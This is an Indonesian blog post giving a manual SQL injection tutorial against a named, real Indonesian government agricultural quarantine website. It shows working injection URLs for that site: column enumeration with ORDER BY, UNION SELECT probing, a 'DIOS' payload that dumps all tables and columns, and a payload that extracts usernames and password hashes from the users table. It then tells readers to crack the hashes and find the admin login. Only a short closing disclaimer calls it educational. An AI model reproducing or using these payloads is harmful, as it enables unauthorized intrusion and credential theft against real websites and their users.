MASIGNALPHAS2101
3071178398193978069

Tutorial SQL Injection Manual

Tutorial SQL Injection Manual
Add Comments
Friday, April 3, 2020


Tutorial SQL Injection manual

Oke Guyss kali ini saya mau share tutorial SQL Injection manual

Sebelum itu siapin dulu bahan-bahannya oke...


~ Hp

~ Kuota internet

~ Dork

~ Kegantengan juga ngaruh loh...


Pertama kalian Dorking dulu kalo kalian nggak punya dork bisa cari di google banyak

Karna disini saya sudah punya target jadi langsung aja oke....


Dan ini Target saya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33


Kalian cek dulu websitenya apakah rentan terhadap SQLi atau tidak

Cara cek nya guampang banget kalian kasih tanda ' itu di belakang nya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'


Di belakangnya ya...

Sebelum..




Sesudah...



Nah kalo blank website berarti vulnerability terhadap SQLi

Abis itu kita tambahin string -- - kek gitu pasti web nya jadi gak blank lagi :)

Tinggal kita cari berapa column di web nya :v


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 1-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 2-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 3-- -


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 4-- -


Di angka 4 web saya blank lagi berarti column nya adalah 4

Ganti order by nya jadi union select


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,2,3,4-- -


Nanti akan keluar angka ajaib seperti ini...




keluar angka 2 dan 4 kalian bisa pilih salah satu..


 berikut beberapa command SQLi

 user()

database()

@@version

@@hostname

@@datadir


Kalian tinggal pilih command diatas nya


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,user(),3,4-- -


Langsung biar Gak lama kasih Dios nya


 make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4-- -

Kalian taro Dios nya di angka ajaib nya nanti akan seperti ini




Kalo udah seperti itu langsung kalian cari usernya!!




(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x)


http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=-33'Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),3,4-- -

Nanti akan seperti ini...




Tinggal kalian hash di https://hashes.com situ

Dan jangan lupa cari adlog nya :)


#Konten Ini Hanya Untuk Pembelajaran (Pengetahuan Semata) #Mohon Untuk Tidak Melakukanya, Kami Tidak Akan Bertanggung Jawab Atas Tindakan Hacking Apapun Yang Kalian Lakukan..!!!
WahyuXploit

comment 1 komentar

more_vert

Note: Only a member of this blog may post a comment.